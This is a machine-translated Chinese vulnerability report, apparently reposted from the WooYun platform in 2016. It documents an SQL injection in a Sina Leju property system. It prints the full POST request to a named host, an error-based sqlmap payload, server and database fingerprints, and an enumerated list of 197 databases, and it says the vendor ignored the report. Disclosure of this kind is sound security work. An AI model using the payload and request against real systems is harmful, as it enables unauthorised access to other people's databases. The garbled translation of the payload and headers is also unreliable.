新浪乐居某系统存在SQL注入漏洞

责声明">
漏洞标题 新浪乐居某系统存在SQL注入漏洞 相关厂商 leju.com 漏洞作者 路人甲 提交时间 2016-06-16 17:16 公开时间 2016-06-21 17:30 漏洞类型 SQL注射漏…
漏洞标题 新浪Leju在系统中有一个SQL注入漏洞 相关制造商 Leju.com 漏洞作者 过路人 提交时间 2016-06-16 17: 16 公共时间 2016-06-21 17: 30 漏洞类型 SQL注入漏洞 危险等级 高 自我评估等级 20 漏洞状态 该漏洞已通知供应商,但供应商忽略了该漏洞 标签标签 漏洞详细信息 参数:xName POST /xiangmulistview.aspx HTTP/1.1 内容长度: 11 内容类型: application/x-www-form-urlencoded Referer:http://shleju.w114.mc-test.com: 80 / Cookie: ASP.NET_SessionId=rslqpvnnhedmgmilulgj3d0z 主机: shleju.w114.mc-test.com 连接:保持活动状态 Accept-Encoding: gzip,deflate 用户代理: Mozilla/5.0(Windows NT 6.1; WOW64)AppleWebKit/537.21(KHTML,与Gecko一样)Chrome/41.0.2228.0 Safari/537.21 接受: */* 的XName=1 * 漏洞证明: Sqlmap标识以下注入点,总共208个HTTP(s)请求: --- 参数:#1 *((自定义)POST) 类型:基于错误 标题: Microsoft SQL Server/Sybase和基于错误的 - WHERE或H * ING子句 有效载荷: xName=1'和2788=CONVERT(INT,(SELECT CHAR(113)+ CHAR(118)+ CHAR(106)+ CHAR(118)+ CHAR(113)+(SELECT(CASE WHEN(2788=2788)) )那么CHAR(49)ELSE CHAR(48)END))+ CHAR(113)+ CHAR(107)+ CHAR(98)+ CHAR(106)+ CHAR(113))) - NKiI --- Web服务器操作系统: Windows 2008或Vista Web应用程序技术: ASP.NET,ASP.NET 4.0.30319,Microsoft IIS 7.0 后端DBMS: Microsoft SQL Server 2000 Sqlmap从存储的会话:恢复以下注入点 --- 参数:#1 *((自定义)POST) 类型:基于错误 标题: Microsoft SQL Server/Sybase和基于错误的 - WHERE或H * ING子句 有效载荷: xName=1'和2788=CONVERT(INT,(SELECT CHAR(113)+ CHAR(118)+ CHAR(106)+ CHAR(118)+ CHAR(113)+(SELECT(CASE WHEN(2788=2788)) )那么CHAR(49)ELSE CHAR(48)END))+ CHAR(113)+ CHAR(107)+ CHAR(98)+ CHAR(106)+ CHAR(113))) - NKiI --- Web服务器操作系统: Windows 2008或Vista Web应用程序技术: ASP.NET,ASP.NET 4.0.30319,Microsoft IIS 7.0 后端DBMS: Microsoft SQL Server 2000 当前用户:'sq_yusuan' 当前数据库:'sq_yusuan' 当前用户是DBA: False Sqlmap从存储的会话:恢复以下注入点 --- 参数:#1 *((自定义)POST) 类型:基于错误 标题: Microsoft SQL Server/Sybase和基于错误的 - WHERE或H * ING子句 有效载荷: xName=1'和2788=CONVERT(INT,(SELECT CHAR(113)+ CHAR(118)+ CHAR(106)+ CHAR(118)+ CHAR(113)+(SELECT(CASE WHEN(2788=2788)) )那么CHAR(49)ELSE CHAR(48)END))+ CHAR(113)+ CHAR(107)+ CHAR(98)+ CHAR(106)+ CHAR(113))) - NKiI --- Web服务器操作系统: Windows 2008或Vista Web应用程序技术: ASP.NET,ASP.NET 4.0.30319,Microsoft IIS 7.0 后端DBMS: Microsoft SQL Server 2000 可用数据库[197]: [*]主人 [*]模型 [*] msdb [*] 北风 [*]酒吧 [*] sq_1252724821 [*] sq_464475463 [*] sq_a0910205251 [*] sq_abc20131113 [*] sq_afanyi2013 [*] sq_agarwood [*] sq_aixiu8023 [*] sq_almono [*] sq_anadolu [*] sq_angoltech [*] sq_baiyuyin [*] sq_bh2345l [*] sq_bjsbfcsq [*] sq_bocetest [*] sq_cake88zs [*] sq_camming [*] sq_ceob521m [*] sq_ceshisql [*] sq_cf7191810 [*] sq_changshi82 [*] sq_chsichsi [*] sq_ckts2014 [*] sq_cl2013 [*] sq_cnwoods [*] sq_comsite [*] sq_cqvitdb [*] sq_czcwan123 [*] sq_danson [*] sq_daohang0808 [*] sq_dbdg2011 [*] sq_dborder [*] sq_ding2013 [*] sq_duduge1 [*] sq_duomeicc [*] sq_dydongrui1 [*] sq_eastlowe [*] sq_eastvendor [*] sq_egrets2000 [*] sq_eimshouse [*] sq_EMeal08 [*] sq_erpcqwjfccn [*] sq_fanyi021net [*] sq_feiyuxiu [*] sq_fjjyyw2013 [*] sq_fjslsp [*] sq_forid317 [*] sq_forwardtoys [*] sq_freedomx [*] sq_fxy0831 [*] sq_fzgrcycom [*] sq_fzhou223mssql [*] sq_gkbbt2 [*] sq_globalshare [*] sq_gywdhg [*] sq_gzdycom [*] sq_gzjspxw123 [*] sq_gzxinhaosi2 [*] sq_h18918960336 [*] sq_hanwei123 [*] sq_hlsyh520 [*] sq_hmddream [*] sq_hnpgxh [*] sq_hnswms [*] sq_hongstar365 [*] sq_huadingit [*] sq_huiyoush [*] sq_hunnintu [*] sq_hxlr2013 [*] sq_hymz888 [*] sq_iuiyiuiy2 [*] sq_jbb365 [*] sq_jiayi161 [*] sq_jinbo6211 [*] sq_jinriyuqid [*] sq_jinrong0808 [*] sq_jixingbang [*] sq_jqsy1718 [*] sq_jsgwyksw [*] sq_jtwdfw [*] sq_junweisiqwe [*] sq_juyu2015 [*] sq_jxg1124 [*] sq_kezhang0808 [*] sq_kuer1002 [*] sq_lantolink [*] sq_lawer360 [*] sq_layer100 [*] sq_liuyinyu [*] sq_liuyong7520 [*] sq_ljstrb [*] sq_longhuyi [*] sq_lsvcom [*] sq_lvegunet [*] sq_lzncic [*] sq_mrmf0001 [*] sq_mrzdh2233 [*] sq_mswh3way [*] sq_muchendiban [*] sq_myintersys [*] sq_mytestdb [*] sq_mywslw [*] sq_nbyaocai123 [*] sq_newswap [*] sq_nf888888 [*] sq_NJDT2015 [*] sq_ntim20130930 [*] sq_pailew [*] sq_pingou [*] sq_pjkc [*] sq_ptsgxq [*] sq_pxid2013 [*] sq_qest2013 [*] sq_qiaoyf [*] sq_qichao3000 [*] sq_qiuh9208 [*] sq_qq1012647 [*] sq_qq503037121 [*] sq_qqqnweb [*] sq_rongyou2014 [*] sq_shanghu2013 [*] sq_shazhongq [*] sq_shboyon2 [*] sq_shchezhixiao [*] sq_shdashequ [*] sq_shengzhaobio [*] sq_shiyin520 [*] sq_shjmkq2000 [*] sq_shkj140813 [*] sq_shkj150425 [*] sq_shkj150721 [*] sq_shkj151016 [*] sq_shkj151026 [*] sq_shkj151217 [*] sq_shkj160503 [*] sq_shkj160509 [*] sq_shkj160525 [*] sq_shkj160603 [*] sq_shujuguanli [*] sq_shujuku2013 [*] sq_shyunwen20131 [*] sq_sinee2016 [*] sq_siteserver [*] sq_sitytech2013 [*] sq_sql2000date [*] sq_sql2000wd [*] sq_sqltopcourage [*] sq_ssdd2013 [*] sq_stgdsyxx [*] sq_sunpcdb1 [*] sq_sunshine2 [*] sq_talentcorpdb1 [*] sq_tbcxmb [*] sq_tcby002 [*] sq_tcdq1974 [*] sq_testlaskdjf [*] sq_tger258369 [*] sq_tingyou123 [*] sq_ufolbb2013 [*] sq_ujoygroup [*] sq_w123456 [*] sq_wczx98 [*] sq_web8980 [*] sq_wem520 [*] sq_wesleydata [*] sq_wlcyjd [*] sq_wxpneumdata [*] sq_wyxfl1 [*] sq_x2013l [*] sq_xad20140530 [*] sq_xdpc111 [*] sq_xifashui [*] sq_xiqing3 [*] sq_xnkq2013 [*] sq_yachuan [*] sq_yanglan21v [*] sq_yangyang [*] sq_yanvps [*] sq_yczedu [*] sq_yfplastic001 [*] sq_yuanbxjz [*] sq_yuetong [*] sq_yusuan [*] sq_yuyue [*] sq_yzspfx [*] sq_zenrebrand [*] sq_zhangma [*] sq_zhuanyi1 [*] sq_zjp03701 [*] sq_zjtonglicom [*] sq_zslpms13 [*] sq_zukexbaicai [*] tempdb 1.png 2.png 3.png 4.png 修理计划: 版权声明:请注明出处。居民A @乌云
  • 发表于 2016-07-17 08:00
  • 阅读 ( 476 )
  • 分类:黑客技术

你可能感兴趣的文章

相关问题

0 条评论

请先 登录 后评论
不写代码的码农
黑客

2107 篇文章

作家榜 »

  1. 黑客 2107 文章